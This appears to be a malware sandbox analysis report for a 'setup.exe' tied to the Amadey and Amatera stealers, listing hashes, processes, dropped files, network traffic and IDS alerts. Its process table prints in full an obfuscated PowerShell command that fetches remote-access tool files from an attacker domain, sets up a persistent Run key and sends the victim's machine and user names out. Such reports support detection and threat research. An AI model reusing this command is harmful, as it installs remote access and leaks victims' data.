| File name: | setup.exe |
| Full analysis: | https://app.any.run/tasks/b6815577-971f-41fa-9be8-12db2ccf764b |
| Verdict: | Malicious activity |
| Threats: | Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. |
| Analysis date: | May 28, 2025, 02:04:48 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows, 8 sections |
| MD5: | AC28E024B3B8E7A054DFAA2883A5590B |
| SHA1: | 2AD3D0CB84A244ACFF393912C4B54C716D99C94C |
| SHA256: | 3CA0877AE8C3C628ACFE78C6847F770FE20F02790F69749216CC703AB0618002 |
| SSDEEP: | 49152:er4WIWYLy+HevHnRWxWMq/fCwCIK4aFOEnEDH5zZoM4jVXQB48I7KZj+9P0s039d:YIHMHRO1YjGVXQB48I7KZj+9Ml9rgqR |
| .exe | | | Inno Setup installer (46.7) |
|---|---|---|
| .exe | | | Win32 Executable (generic) (1.9) |
| .exe | | | Generic Win/DOS Executable (0.8) |
| .exe | | | DOS Executable Generic (0.8) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2011:12:20 14:16:51+00:00 |
| ImageFileCharacteristics: | No relocs, Executable, No line numbers, No symbols, Bytes reversed lo, 32-bit, Bytes reversed hi |
| PEType: | PE32 |
| LinkerVersion: | 2.25 |
| CodeSize: | 1022976 |
| InitializedDataSize: | 130048 |
| UninitializedDataSize: | - |
| EntryPoint: | 0xfaf7c |
| OSVersion: | 5 |
| ImageVersion: | 6 |
| SubsystemVersion: | 5 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 51.1052.0.0 |
| ProductVersionNumber: | 0.0.0.0 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | Neutral |
| CharacterSet: | Unicode |
| FileDescription: | Setup/Uninstall |
| FileVersion: | 51.1052.0.0 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 232 | C:\WINDOWS\SysWOW64\WerFault.exe -u -p 5304 -s 576 | C:\Windows\SysWOW64\WerFault.exe | — | shark2.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Problem Reporting Exit code: 0 Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 540 | "C:\Program Files (x86)\Microsoft\Temp\EUA953.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" | C:\Program Files (x86)\Microsoft\Temp\EUA953.tmp\MicrosoftEdgeUpdate.exe | MicrosoftEdgeWebview2Setup.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft Edge Update Exit code: 2147747592 Version: 1.3.195.25 Modules
| |||||||||||||||
| 664 | C:\WINDOWS\SysWOW64\WerFault.exe -u -p 5304 -s 612 | C:\Windows\SysWOW64\WerFault.exe | — | shark2.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Problem Reporting Exit code: 0 Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 968 | C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | C:\Windows\System32\rundll32.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1056 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -nOprOfiLE -EP ByPasS -wIndowsTyL h -enC $ K 7 b a m = ' c : \ p r O G R a M   F i L E S \ ' ;   $ j D 4 A 6 = ( g E t - W M i O b j e C t   - c L a S s   w i n 3 2 _ c O m P U t E r S Y S T E M ) . p a r t o F d o M a i n ;   $ g N H 6 u = ' h K C U : \ s O F t W A r E \ ' ;   $ h I b w z = ' H k l M : \ s O f t W A r e \ C l A s s E S \ ' ;   $ m n 4 n 7 = 0 ;   $ y E h N r = ' h K c U : \ s O f t W A R E \ c L a s S E S \ ' ;   $ a M 2 E K = $ E N v : L O c A l a P p D A t A + ' \ P R O g R A m S \ ' ;   $ U K w r Y = @ (   $ y E H N r + ' a O p p ' ;   $ a m 2 e K + ' r a b b Y - d e S K T O P \ R a b b Y   D E S k T O p . e x E ' ;   $ y e H N R + ' t r e Z O R S u i t E ' ;   $ A m 2 e k + ' K e E P K e Y - D e s K T O p \ k e e P k E Y   D E s K T O p . e X e ' ;   $ y e h n R + ' K e e V O ' ;   $ h i b w Z + ' l e D g e R l I V e ' ;   $ a M 2 E k + ' t r e Z o r   s u I T e \ t r e z o R   s u I T e . e X e ' ;   $ g N h 6 u + ' b i T b O x A P p ' ;   $ y E H n r + ' L I q u I D n e t W o r K ' ;   $ k 7 B a m + ' b L O c K s t R e a m \ b l o C K s t r E A m   G r e E n \ b L o C K s T r E a m   g R e e n . E x e ' ;   $ g n h 6 U + ' r E A L   s e C U R i T y \ B c V A U L t ' ;   $ y e h n r + ' C Y P H E r O c k ' ;   $ a m 2 E K + ' k e E v O - w a l l E T \ k e E v O   l i n k . E x E ' ;   $ K 7 b A m + ' B c   v A U L T \ b C v A u L T . e X e ' ;   $ A M 2 e k + ' C y P h E r O C K   c y s y N c \ C y P h e r O c K   C Y S y N c . E X E ' ;   $ H i B w z + ' B C V A U L T ' ;   $ g N h 6 U + ' M I C r o s o F T \ W I N d o w S \ C U R r e n t V e r s i o n \ U N i n s T a L l \ b I T B o X a P p ' ;   $ K 7 b A M + ' O n e k E y \ O N E k E Y . e x e ' ;   $ Y e h N r + ' K E e P k E Y ' ;   $ Y E H N R + ' O N E K E Y - W a l L E t ' ;   $ K 7 b a M + ' l e D G E r   L i V E \ L e D G E R   L i v E . E X E ' ;   $ K 7 B A m + ' B i T B O x \ b I T b O X . e x E ' ;   ) ;   $ 8 B I K Z = $ u k W R y . l E n G t H ;   I f   ( $ j d 4 A 6 )   { $ M N 4 n 7 = 1 }   E L S E   {   F o r   ( $ z u 8 s = 0 ;   $ z U 8 S   - L T   $ 8 b I K z   - a n d   $ M N 4 N 7   - e q   0 ;   $ z U 8 s + + )   {   i f   ( T E s t - p A T h   $ U K w R Y [ $ z U 8 S ] )   { $ m n 4 n 7 = 1 } ; } ; } ;   I f   ( $ m n 4 n 7   - E Q   1 )   {   [ n E t . S E R V I c e p o I N t m A N a g E r ] : : s e c U r I t y p r O T o c O l   =   [ n e t . S e C u r I t y P r o T O c o l t y P e ] : : t L S 1 2 ;   $ Q A E w W 1 = ' h t t p s : / / n a t u r i s t v e n u e . d i g i t a l / E d F u A r 8 Q x n G f / s n o w . z i p ' ;   C h d I r   $ e n v : A P P D A T a ;   $ J 7 u g m a b = g c m   s T A R t - B i T s T R A n s F e r   - E R R O r a c T I o n   s i L e N t l Y c O N T I N U E ;   $ m k A u m 9 = ' W i n d l l i n i t ' ;   $ B t c O i V v U = $ E N V : A P P D A t A + ' \ ' + $ m k A u m 9 ;   t R Y   {   a D D - T y p e   - A s s E m B l Y N A m e   s Y S t e m . i o . C o M p R E s s i O N ,   s Y s T E m . I O . C o M P r e S S i o N . f i l e s y S T e m   - E r r o R A c t I o N   S i l e N t L y c O n t I n u E ;   N e w - i T e M   - p a t h   $ E N V : A p P D A T a   - n a m E   $ m k A u m 9   - i t E M T Y p e   ' d i r e c t o r y ' ;   $ F I w p q R I K = ( C u R L   - U R i   $ Q A E w W 1   - U s E b a s I c P A r S I n G ) . C O n T e n t ;   $ W s A 8 y w = n e w - o B j e c T   s Y s T e m . I o . m E M O R Y S T R e a m ;   $ W s A 8 y w . w r I t e ( $ F I w p q R I K ,   0 ,   $ F I w p q R I K . l e N G T H ) ;   $ W s A 8 y w . S e e K ( 0 ,   [ s y s t E M . i o . S e E K O R I g i N ] : : b e g I N )   |   O u T - N u L L ;   $ K I X P 1 V = n e w - O b J e c T   s Y s t E m . i O . c o M p R e s S I O N . z i p A R C H i v e ( $ W s A 8 y w ,   [ s y S t E M . i O . C O m p R e s S i O n . Z i P A R c h I V e M O d e ] : : r e A d ) ;   f O r e a C h ( $ y x H f m O f   i n   $ K I X P 1 V . e n t r I e s )   {   $ p Y q D g T = $ B t c O i V v U + ' \ ' + $ y x H f m O f . N A m E ;   $ Z 3 4 c J l 0 = $ y x H f m O f . o P e N ( ) ;   $ k L P v O n C = [ s y s T E m . I o . F I l E ] : : C r e A T e ( $ p Y q D g T ) ;   $ Z 3 4 c J l 0 . c O p y T o ( $ k L P v O n C ) ;   $ k L P v O n C . C l o s e ( ) ;   $ Z 3 4 c J l 0 . C l O s E ( ) ; }   $ K I X P 1 V . d i s p O S e ( ) ;   $ W s A 8 y w . D I S P O s E ( ) ;   }   c a t c h   { $ E X F 1 n W = ' h t t p s : / / n a t u r i s t v e n u e . d i g i t a l / i Y d C X Z K u 3 m v s / ' ;   n I   - P A t H   $ E N v : a p p D a t A   - n a M E   $ m k A u m 9   - I T E M t Y p e   ' d i r e c t o r y ' ;   $ d 4 2 7 W F O b = @ ( ' m i c l i e n t ' ,   ' p c i c a p i . d l l ' ,   ' A u d i o C a p t u r e . d l l ' ,   ' c l i e n t 3 2 . i n i ' ,   ' m s v c r 1 0 0 . d l l ' ,   ' P C I C H E K . D L L ' ,   ' n s k b f l t r . i n f ' ,   ' r e m c m d s t u b . e x e ' ,   ' T C C T L 3 2 . D L L ' ,   ' P C I C L 3 2 . D L L ' ,   ' N S M . L I C ' ,   ' H T C T L 3 2 . D L L ' ,   ' n s m _ v p r o . i n i ' ) ;   I f   ( $ J 7 u g m a b )   {   $ d 4 2 7 W F O b   |   f O R e A C H   {   $ r u M 8 q b 0 = $ E X F 1 n W + $ _ ;   $ J T v B w f 5 = $ B t c O i V v U ,   $ _   - j O I n   ' \ ' ;   s T A r T - b i t S t r a n S f E R   - s o u R c e   $ r u M 8 q b 0   - d e S t I n A t i o N   $ J T v B w f 5 ;   } ; }   e L s e   {   $ d 4 2 7 W F O b   |   F O r E A c h - O b j E c t   {   $ r u M 8 q b 0 = $ E X F 1 n W + $ _ ;   $ J T v B w f 5 = j O I N - p a t H   - p A T h   $ B t c O i V v U   - c h i l d p a T h   $ _ ;   $ b a A x e p = " b I t s A d m I N . E x E   / T R a n s F e R   K t O 3 6 3   / d o w n l o A D   / p r I o r I T y   n o R M A l   $ r u M 8 q b 0   $ J T v B w f 5 " ;   i n v O K e - E x p r E S s i o n   - C O m m a N D   $ b a A x e p ; } ;   } ;   } ;   $ V 9 k S r a B V = g I   $ B t c O i V v U   - f o R c e ;   $ V 9 k S r a B V . a T T R I b u T e s = ' H i d d e n ' ;   $ j E m P x H = $ B t c O i V v U ,   ' m i c l i e n t '   - J o i n   ' \ ' ;   C h d I r   $ B t c O i V v U ;   N E w - i T e m p r O P e r t Y   - P A t H   ' h k C U : \ S o f T W a r e \ M I c R o S O f t \ w I N d O w S \ C U r R e N T V E r s I O N \ R u N '   - n a M E   $ m k A u m 9   - v a L u e   $ j E m P x H   - P r O p E r t y t Y p E   ' S t r i n g ' ;   S T a R T - P r O c E s S   m i C L I e n t ;   $ C 1 g H = g p s   c l i e n t 3 2   - E R r o R a C t i o n   s i L e n T l y C o N T i N U E ;   $ Z M H e = " h t t p s : / / n a t u r i s t v e n u e . d i g i t a l / s t a t / i n s t a l l _ n o t i f i e r . p h p ? c p n m e = $ e n V : c o M p U T E R n A m E & u s n m e = $ E N V : u S e R n A M e & p a r a m = " ;   i F   ( $ C 1 g H . i D )   {   $ R a K A = $ Z M H e + ' x y u R Z ' ;   i N V O k E - W e B r e Q U e s T   $ R a K A   - U S E B a S i c P a R s I n G ; }   e L S E   {   $ R a K A = $ Z M H e + ' C h B o j ' ;   i N V O k E - W e B r e Q U e s T   $ R a K A   - u S e b A s i C P A r s I n G ; } ;   } ;  | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1312 | "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.59\elevation_service.exe" | C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.59\elevation_service.exe | — | services.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft Edge Exit code: 0 Version: 122.0.2365.59 Modules
| |||||||||||||||
| 1324 | "C:\ProgramData\shark.exe" | C:\ProgramData\shark.exe | svchost.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Modules
| |||||||||||||||
| 1512 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | — | setup.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Exit code: 0 Version: 122.0.2365.59 Modules
| |||||||||||||||
| 1512 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1672 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | — | setup.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Exit code: 1 Version: 122.0.2365.59 Modules
| |||||||||||||||
| (PID) Process: | (2104) chrome.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon |
| Operation: | write | Name: | failed_count |
Value: 0 | |||
| (PID) Process: | (2104) chrome.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon |
| Operation: | write | Name: | state |
Value: 2 | |||
| (PID) Process: | (5984) chrome.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon |
| Operation: | write | Name: | failed_count |
Value: 1 | |||
| (PID) Process: | (1512) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon |
| Operation: | write | Name: | failed_count |
Value: 0 | |||
| (PID) Process: | (1512) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon |
| Operation: | write | Name: | state |
Value: 2 | |||
| (PID) Process: | (4844) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon |
| Operation: | write | Name: | failed_count |
Value: 1 | |||
| (PID) Process: | (4572) chrome.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon |
| Operation: | write | Name: | failed_count |
Value: 2 | |||
| (PID) Process: | (4572) chrome.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon |
| Operation: | write | Name: | state |
Value: 3 | |||
| (PID) Process: | (1672) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon |
| Operation: | write | Name: | failed_count |
Value: 2 | |||
| (PID) Process: | (1672) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon |
| Operation: | write | Name: | state |
Value: 3 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4300 | setup.exe | C:\Users\admin\hjksfir.exe | executable | |
MD5:FDA139D8EDC75F77C2606DC9A67F762D | SHA256:B8DFA80C6A22B7168B3B6738295A472C1F8D96C932062C72A53062B04DE909EA | |||
| 4572 | chrome.exe | C:\Users\admin\AppData\Local\Temp\Cookies | binary | |
MD5:06AD9E737639FDC745B3B65312857109 | SHA256:C8925892CA8E213746633033AE95ACFB8DD9531BC376B82066E686AC6F40A404 | |||
| 7788 | chrome.exe | C:\Users\admin\AppData\Local\Temp\Web Data | binary | |
MD5:F6C33AC5E1032A0873BE7BFC65169287 | SHA256:D97895CEDED32E33D57BDCACCDBE144E58AA87AF4D2F8855D630286CE30A8D83 | |||
| 4300 | setup.exe | C:\Users\admin\hjksfij.exe | executable | |
MD5:5F1A020D6E940E4F6D5293E30A677CAD | SHA256:4154983451D0FE857A58D709E2A3162808A529249EF9B411AAE7B227851699ED | |||
| 7412 | hjksfir.exe | C:\Users\admin\Kildonpluk.nro | binary | |
MD5:DDA10F672154CA8ADC106D25054B6BBF | SHA256:CE0ED30A1D83319EE5A9695F484030808CEFA92008E43CDFD8131D18C047AFA1 | |||
| 7412 | hjksfir.exe | C:\Users\admin\Fredpreertkan.tzae | binary | |
MD5:F3B1AFB98D592FF46ADA9957A7DC6339 | SHA256:FDD94E4736B89CF1D79796C9861B44A28FF4E30F553650858289D8CA8E8A7064 | |||
| 7412 | hjksfir.exe | C:\Users\admin\DivXDownloadManager.dll | executable | |
MD5:44EAFDF1B94D77F58DDB5C6D7508A733 | SHA256:78F73687156C83E6E1A98C396931A2A17CF12DCCED95983FB6DD1DE3CDB1528E | |||
| 7412 | hjksfir.exe | C:\Users\admin\NahimicSvc64.exe | executable | |
MD5:FF254C1778AEFE5AF06889F1F999DEE3 | SHA256:94BC0C01641801F258E207ECA8227845F3F1C686E7394CE3864A6B2538B8EADB | |||
| 7412 | hjksfir.exe | C:\Users\admin\msvcp80.dll | executable | |
MD5:272A9E637ADCAF30B34EA184F4852836 | SHA256:35B15B78C31111DB4FA11D9C9CAD3A6F22C92DAA5E6F069DC455E72073266CC4 | |||
| 4740 | NahimicSvc64.exe | C:\ProgramData\MBSDK\DivXDownloadManager.dll | executable | |
MD5:44EAFDF1B94D77F58DDB5C6D7508A733 | SHA256:78F73687156C83E6E1A98C396931A2A17CF12DCCED95983FB6DD1DE3CDB1528E | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
7604 | svchost.exe | GET | 200 | 2.20.245.137:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
7420 | RUXIMICS.exe | GET | 200 | 2.20.245.137:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
7604 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
7420 | RUXIMICS.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | POST | 200 | 40.126.31.130:443 | https://login.live.com/RST2.srf | unknown | xml | 1.24 Kb | whitelisted |
— | — | POST | 400 | 20.190.159.23:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | unknown | text | 203 b | whitelisted |
— | — | POST | 400 | 40.126.31.130:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | unknown | text | 203 b | whitelisted |
— | — | POST | 400 | 40.126.31.73:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | unknown | text | 203 b | whitelisted |
— | — | GET | 200 | 104.21.16.1:443 | https://yu.troutbunion.bet/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 | unknown | text | 32.1 Kb | malicious |
— | — | POST | 400 | 40.126.31.129:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | unknown | text | 203 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
7604 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
7420 | RUXIMICS.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
7604 | svchost.exe | 2.20.245.137:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted |
7420 | RUXIMICS.exe | 2.20.245.137:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted |
7604 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
7420 | RUXIMICS.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
naturistvenue.digital |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
— | — | Misc activity | ET HUNTING ZIP file exfiltration over raw TCP |
— | — | A Network Trojan was detected | ET MALWARE ACR/Amatera Stealer CnC Checkin Attempt |
— | — | Misc activity | ET HUNTING ZIP file exfiltration over raw TCP |
— | — | Malware Command and Control Activity Detected | ET MALWARE ACR/Amatera Stealer CnC Exfil (POST) M1 |
— | — | Misc activity | ET HUNTING ZIP file exfiltration over raw TCP |
— | — | Malware Command and Control Activity Detected | ET MALWARE ACR/Amatera Stealer CnC Exfil (POST) M1 |
— | — | Misc activity | ET HUNTING ZIP file exfiltration over raw TCP |
— | — | Malware Command and Control Activity Detected | ET MALWARE ACR/Amatera Stealer CnC Exfil (POST) M1 |
— | — | Misc activity | ET HUNTING ZIP file exfiltration over raw TCP |
— | — | Malware Command and Control Activity Detected | ET MALWARE ACR/Amatera Stealer CnC Exfil (POST) M1 |